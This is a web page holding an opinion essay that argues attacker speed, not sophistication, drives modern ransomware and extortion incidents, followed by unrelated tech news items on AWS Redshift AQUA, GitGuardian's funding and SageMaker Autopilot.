    • Microsoft Text-to-Speech engine manipulation.
    • AIM/ICQ/MSIM spies, and/or impersonation
    • File download from PC into a customized dictionary attack.
    • Passwords stored in registry, DUN account settings, etc.
    • Remote Network Sniffers

Suffice to say that it is not sophistication that is the modern attacker’s advantage over us. From an attacker’s point of view, your network and your entire security stack is much more sophisticated in terms of raw code development, integration, compute power and design.

Hacker’s must face any number of disparate and diverse technologies in order to successfully evade, persist and move about a victim environment. Pundits argue that hackers only need to be right once to succeed, whereas defenders need to be right 100% of the time to prevent an incident. Those pundits haven’t spent enough time as an offensive red teamer. It is the opposite that is true: A hacker needs to be right 100% of the time to pull off their objective undetected, and it is the defender that only needs to be right once, to fully interrupt and halt the attacker’s kill chain.

But we don’t think of the problem space this way as an industry, as we have been in a state of reaction since the ‘breach era’ of 2013 thru to the present. We lament and exclaim to one another that it is only a matter of when, not if we will be breached. It is against this pretext that we have come to believe the adversary is more sophisticated than we are. But they aren’t.

Speed is the Enemy’s Invisible Advantage

If there is one thing I learned in the 15 or so years I consulted in the Department of Defense (DoD) cyber space, it is this: No matter how much visibility, continuous monitoring or data crunching you do as an enterprise, none of it matters one lick if the enemy outpaces that effort.

This was incredibly apparent when one of the least sophisticated nation state threat actors at the time was able to compromise, persist within, and exfiltrate data from a million-device enterprise. It was also a painful lesson (at the time) in the area of web application security. Immense effort went into monitoring the logs of critical web applications, but none of the effort ever successfully prevented the risk impact to the mission from occurring.

Similarly with call-back (aka “C2” or “command and control”) detection, NetSec teams became inundated with alerts, all of which needed to be vetted, and all of which were acted upon after the callback connections had occurred, along with the additional tools, payloads, or data exfiltration taking place within those connections that had already occurred.

This same ‘time lag’ the Department of Defense struggled to address, is the same time lag we are all struggling to address. It is the reason we are on our heels.

So we see that it is neither the sophistication of the threat, nor our inability to detect after-the-fact that gives the adversary the upper hand. When an accident happens on the freeway, there is often nothing sophisticated about what happened to cause it. And, when the forensics team comes to investigate what happened, they can usually piece together what the root cause was, what the safety failures were, what the driver behaviors/choices were, and what the damage/impact was. That is what hindsight gives us: 20/20 vision.

Human beings relish in the ability to understand what has happened. We usually don’t even care how a bad thing might happen until after it has happened. That’s when shareholders pick up the phone. That’s when attorneys come into play. That’s when public statements and notifications need to be made. That is when we become interested as defenders in what just happened.

But by the time we initiate and complete those after-the-fact activities to get smarter about what happened, the adversary has already won in every sense of the word. They’ve gained security control without authorization. They’ve impacted the organization before the organization even realizes it. They’ve elevated privileges, run queries, grabbed data, or destroyed it. They’ve. Already. Won.

Reject the ‘Good Loser’ Mentality

Yet here we are still trying to frame this entire landscape in human time frames… minutes, days, weeks, months and years. One minute to detection? Are you kidding? We turn up to the game a minute after the final whistle? It’s already over!

Don’t talk about dwell times and how millions can be saved if you can just keep a breach dwell time under 200 days instead of the average 285 days. That’s hotwash. That’s risk offset. We have fallen into the fake comfort of explaining what happened, of justifying our failure. We do all the things a professional sports team might do after they lose the game.

And we’ve gotten so good at these things that it has affected our very ability to perceive and attack the problem. It has become the language of cyber security. There are even vendors that proclaim the ‘standard’ of how long it takes to detect, alert and remediate an incident should be measured in minutes and hours. As if the actual adversary even cares what a vendor’s SLA might be. As if we are still living in the 2013-2015 post-breach ‘wake-up call’ world. As if our primary role as a CISO is to be able to describe with perfect visibility, exactly how the enemy of the organization just succeeded in negatively impacting our organization and its mission. How far we’ve strayed from the basic tenets of information security of the 1990s! How much profit and pleasure the adversary takes in us having done so!

And let’s be honest: how much profit and pleasure has the security vendor industry also taken in perpetuating the problem by never fully solving it and charging for EPS (events per second), alerts, data retention time in the cloud, incident response services, and (insert all the fantastic cyber pew pew here)?

What Does 2020 and Beyond Look Like?

We’ve seen this coming. We’ve all talked about it. I predicted it in 2016: That ransomware campaigns would begin to leverage much more than just encryption routines to extort us. It was extremely forth-telling that a Mexican Oil and Gas company got targeted by a DopplePaymer ransomware campaign (whose lightening-fast payload performs over 2000 malicious operations on the host in less than 7 seconds) that also affected its cardiac/hospital care center in Tabasco even as the author of the malware embedded a comment in their code that reads:

“We don’t care who you are and why this happens. No one died. That’s all”.

That same ransom note also threatened to dox (expose, leak) or sell sensitive information that the attackers said they exfiltrated prior to encrypting their network, should the victim not pay the ransom in time. And speaking of time…time matters!: Vanderbilt recently completed a study showing that over 2100 cardiac patients die every year in America due to cyber breaches and ransom events and their effect on hospitals… and it comes down to the additional 2.7 minutes it takes to get an EKG performed before a doctor knows what the correct treatment is.

It was even more instructive when on the 25th of November this year, we learned that the ChaCha (aka TA2101) ransomware gang actually did dox 700mb of data from their victim (Allied Universal, $7B valuation) when Allied decided not to pay the $2.1m ransom that has since ballooned to $4m after a delay in payment. This marks the first publicly-known event where such ‘secondary extortion’ has been exerted on a victim.

That will in turn lead to other universally ugly evolutions, such as dropping CP (Child Pornagraphy) files inside an organization to exasperate and overwhelm a victim into paying. We’ve already seen this happen during non-ransomware targeted attacks, when attackers left CP behind on purpose, knowing that doing so changes the forensics landscape by requiring HR intervention and CP reporting laws to kick in.

Entire email account inboxes can also be leveraged as well: there is nothing that is off-limits in the mind of the criminal extortionist. Case in point: the same attackers that targeted Allied also gained access to private Allied.com email keys that had been stored in plaintext, and which could be used by, say, an emotet campaign operator to spoof malicious spam from. This ostensibly represents yet another form of risk to Allied, which effectively applies even greater pressure by the attacker.

Putting It All Into Perspective

Most organizations realize they are victim to a ransomware event only after the first few machines begin to get encrypted. By this time, the majority of attack kill chains have already played out. Footholds were gained, credentials stolen, lateral movement achieved, spreading via domain credentials and tools accomplished, persistence established and (as we just learned above) sensitive data already exfiltrated.

Note that the same ‘low and slow’ breach story of 2013-2015 isn’t what is at play here. Attackers can much more easily discover and exfiltrate sensitive data now, and whether this data is the ‘crown jewels’ or not is nearly irrelevant in the context of the modern hyper-velocity kill chain. It is leverage, nothing more. It leverages the imagination of the victim more than it leverages the value of the stolen data on the dark web.

It doesn’t matter if the attacker gets salted password hashes, secret sauce formulas, customer lists, PHI/PCI, or inventory/warehousing data, so long as it is seen that the attackers simply stole data the reputational damage is done.

Just like Fin6 might pivot from an initial RDP foothold to a one-word query for a gift-card portal on a BigFix device, the modern extortionist hacker might simply reduce their exfiltration strategy to “What’s the most amount of data I can find/access/exfiltrate the soonest?”. And though it may sound like a bold assertion, there is simply no reason why any criminal group targeting an organization wouldn’t simply grab already leaked or sold data for that organization from the Deep Dark Web prior to launching a targeted ransomware campaign to claim they have access to and have exfiltrated current data.

No matter how we imagine 2020 and beyond to play out, one thing is certain: It will continue to play out faster than it has in the past. It will continue to overwhelm — by speed, not sophistication — legacy security controls and after-the-fact visibility efforts. It will continue to reward the criminals that are the laziest and the quickest. It will continue to employ as many forms of leverage as an attacker can easily bestow on their victim. It will continue to move at the speed of computing itself when it comes to how fast a given payload can execute, modify, evade, persist and control a target asset.

This applies not only to Traditional IT workstations and servers, but also to VDI environments and within the cloud workload migration story unfolding before us. The technology, intelligence, and security enforcement required to stop these fast moving threats needs to be present in both the cloud as well as at the edge (on the endpoint), whatever that endpoint may be. To the extent we do not solve the speed advantage the attacker has had over us, we will remain embattled, in retreat, and at risk. The real threat convergence story revolves around speed, not sophistication.

So What Can We Do?

Thankfully, there are organizations that have already realized this new reality and have adapted their strategies, their staffing goals, their security stack and their understanding of what true risk offset looks like going forward. Mostly, these are those organizations that have either endured an event like WannaCry or NotPetya two years ago, or they are the ones that have had their production or services directly affected by these more recent ransomware variants like DopplePaymer or Maze, etc. I’ve said it before and I’ll keep saying it:

There are now only two kinds of organizations in the world today: Those that have been through these kinds of destructive fast-moving events, and those that have not; these two kinds of organizations look, feel, budget, staff and operate completely different from one another.

You can almost reduce the modern CISO challenge down to the task of getting an organization that hasn’t been through a major destructive event to act like they have anyway, so that they can take the necessary steps to get ahead of these fast moving threats and prevent such an event from ever happening.

Hint: this isn’t about back-up and restore strategies and different risk offsets. This isn’t about 1/10/60 SLA’s with cloud-native vendors persuading you they have a chance at stopping code-on-code run-time threats. This isn’t about reacting and setting expectations with the board that it’s only a matter of time before the bad day happens.

No, this is about the hard work of actually beating the adversary at their own game: speed.

To do that, I’ll leave you with what is probably the best word to describe the entire movement upon us: anticipation…but a new kind of anticipation that focuses on where and when the actual fight in the ring is happening… not on the locker room after the fighter has already lost and is bloodied up and battered, trying to restore herself.

When the bell rings and it is go-time, the fighter doesn’t get to dial up The Cloud for answers. She doesn’t get to crowdsource her intelligence from all the onlookers in the stands. She doesn’t even get to listen to the coach shouting from the ropes. Nope. She needs to keep her eyes on the opponent’s hips and anticipate the next move, and even more importantly, respond in fractions of a second, with a counter-punch to knock them out.

After all, when is it OK as a boxer to be on your heels? For those who know, the answer is: never.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

AWS speeds up Redshift queries 10x with AQUA

At its re:Invent conference, AWS CEO Andy Jassy today announced the launch of AQUA (the Advanced Query Accelerator) for Amazon Redshift, the company’s data warehousing service. As Jassy noted in his keynote, it’s hard to scale data warehouses when you want to do analytics over that data. At some point, as your data warehouse or lake grows, the data starts overwhelming your network or available compute, even with today’s highspeed networks and chips. So to handle this, AQUA is essentially a hardware-accelerated cache and promises up to 10x better query performance than competing cloud-based data warehouses.

“Think about how much data you have to move over the network to get to your compute,” Jassy said. And if that’s not a problem for a company today, he added, it will likely become one soon, given how much data most enterprises now generate.

With this, Jassy explained, you’re bringing the compute power you need directly to the storage layer. The cache sits on top of Amazon’s standard S3 service and can hence scale out as needed across as many nodes as needed.

AWS designed its own analytics processors to power this service and accelerate the data compression and encryption on the fly.

Unsurprisingly, the service is also 100% compatible with the current version of Redshift.

In addition, AWS also today announced next-generation compute instances for Redshift, the RA3 instances, with 48 vCPUs and 384GiB of memory and up to 64 TB of storage. You can build clusters of these with up to 128 instances.

GitGuardian raises $12M to help developers write more secure code and ‘fix’ GitHub leaks

Data breaches that could cause millions of dollars in potential damages have been the bane of the life of many a company. What’s required is a great deal of real-time monitoring. The problem is that this world has become incredibly complex. A SANS Institute survey found half of company data breaches were the result of account or credential hacking.

GitGuardian has attempted to address this with a highly developer-centric cybersecurity solution.

It’s now attracted the attention of major investors, to the tune of $12 million in Series A funding, led by Balderton Capital . Scott Chacon, co-founder of GitHub, and Solomon Hykes, founder of Docker, also participated in the round.

The startup plans to use the investment from Balderton Capital to expand its customer base, predominantly in the U.S. Around 75% of its clients are currently based in the U.S., with the remainder being based in Europe, and the funding will continue to drive this expansion.

Built to uncover sensitive company information hiding in online repositories, GitGuardian says its real-time monitoring platform can address the data leaks issues. Modern enterprise software developers have to integrate multiple internal and third-party services. That means they need incredibly sensitive “secrets,” such as login details, API keys and private cryptographic keys used to protect confidential systems and data.

GitGuardian’s systems detect thousands of credential leaks per day. The team originally built its launch platform with public GitHub in mind; however, GitGuardian is built as a private solution to monitor and notify on secrets that are inappropriately disseminated in internal systems as well, such as private code repositories or messaging systems.

Solomon Hykes, founder of Docker and investor at GitGuardian, said: “Securing your systems starts with securing your software development process. GitGuardian understands this, and they have built a pragmatic solution to an acute security problem. Their credentials monitoring system is a must-have for any serious organization.”

Do they have any competitors?

Co-founder Jérémy Thomas told me: “We currently don’t have any direct competitors. This generally means that there’s no market, or the market is too small to be interesting. In our case, our fundraise proves we’ve put our hands on something huge. So the reason we don’t have competitors is because the problem we’re solving is counterintuitive at first sight. Ask any developer, they will say they would never hardcode any secret in public source code. However, humans make mistakes and when that happens, they can be extremely serious: it can take a single leaked credential to jeopardize an entire organization. To conclude, I’d say our real competitors so far are black hat hackers. Black hat activity is real on GitHub. For two years, we’ve been monitoring organized groups of hackers that exchange sensitive information they find on the platform. We are competing with them on speed of detection and scope of vulnerabilities covered.”

AWS AutoPilot gives you more visible AutoML in SageMaker Studio

Today at AWS re:Invent in Las Vegas, the company announced AutoPilot, a new tool that gives you greater visibility into automated machine learning model creation, known as AutoML. This new tool is part of the new SageMaker Studio also announced today.

As AWS CEO Andy Jassy pointed out onstage today, one of the problems with AutoML is that it’s basically a black box. If you want to improve a mediocre model, or just evolve it for your business, you have no idea how it was built.

The idea behind AutoPilot is to give you the ease of model creation you get from an AutoML-generated model, but also give you much deeper insight into how the system built the model. “AutoPilot is a way to create a model automatically, but give you full visibility and control,” Jassy said.

“Using a single API call, or a few clicks in Amazon SageMaker Studio, SageMaker Autopilot first inspects your data set, and runs a number of candidates to figure out the optimal combination of data preprocessing steps, machine learning algorithms and hyperparameters. Then, it uses this combination to train an Inference Pipeline, which you can easily deploy either on a real-time endpoint or for batch processing. As usual with Amazon SageMaker, all of this takes place on fully-managed infrastructure,” the company explained in a blog post announcing the new feature.

You can look at the model’s parameters, and see 50 automated models, and it provides you with a leader board of what models performed the best. What’s more, you can look at the model’s underlying notebook, and also see what trade-offs were made to generate that best model. For instance, it may be the most accurate, but sacrifices speed to get that.

Your company may have its own set of unique requirements and you can choose the best model based on whatever parameters you consider to be most important, even though it was generated in an automated fashion.

Once you have the model you like best, you can go into SageMaker Studio, select it and launch it with a single click. The tool is available now.